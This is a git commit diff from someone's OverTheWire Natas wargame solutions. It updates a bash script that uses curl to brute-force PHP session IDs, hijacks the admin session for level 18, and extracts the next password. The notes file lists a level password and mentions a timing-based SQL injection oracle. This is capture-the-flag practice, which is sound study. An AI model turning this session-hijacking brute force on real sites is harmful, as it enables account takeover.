<Natas> scripts/natas18.sh(working)
This commit is contained in:
parent
42ecc035b5
commit
9cd4fbcbf5
2 changed files with 11 additions and 6 deletions
|
|
@ -72,7 +72,6 @@ natas18: 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
|
|||
Another oracle attack using an SQL injection AND this time
|
||||
using a timing based attack.
|
||||
NOTE: see [[#Natas17 Solution Script|Appendix/"Natas17 Solution Script"]]
|
||||
|
||||
natas19:
|
||||
natas20:
|
||||
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@ USERNAME="admin"
|
|||
PASSWORD="arbitrary"
|
||||
|
||||
req() {
|
||||
local SESSION_ID=$1
|
||||
SESSION_ID=$1
|
||||
curl http://natas18.natas.labs.overthewire.org/index.php \
|
||||
-X POST \
|
||||
-u natas18:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ \
|
||||
|
|
@ -14,13 +14,19 @@ req() {
|
|||
-d "password=$PASSWORD" \
|
||||
--cookie "PHPSESSID=$SESSION_ID" \
|
||||
-sS \
|
||||
| grep "regular user" &>/dev/null
|
||||
| grep "Password: "
|
||||
}
|
||||
|
||||
MIN_ID=0
|
||||
MAX_ID=640
|
||||
for ((i=MIN_ID ; i <= MAX_ID ; i++)); do
|
||||
printf "Attempt: %2d" $i
|
||||
req "$i" && echo -en '\r' || $(echo " [admin]"; break)
|
||||
|
||||
printf "Attempt: %2d" $i
|
||||
OUT=$(req "$i")
|
||||
if [ $? -ne 0 ]; then
|
||||
echo -en '\r'
|
||||
else
|
||||
echo " [admin]"
|
||||
echo $OUT | awk '{print substr($2,1,32)}'
|
||||
break
|
||||
fi
|
||||
done
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue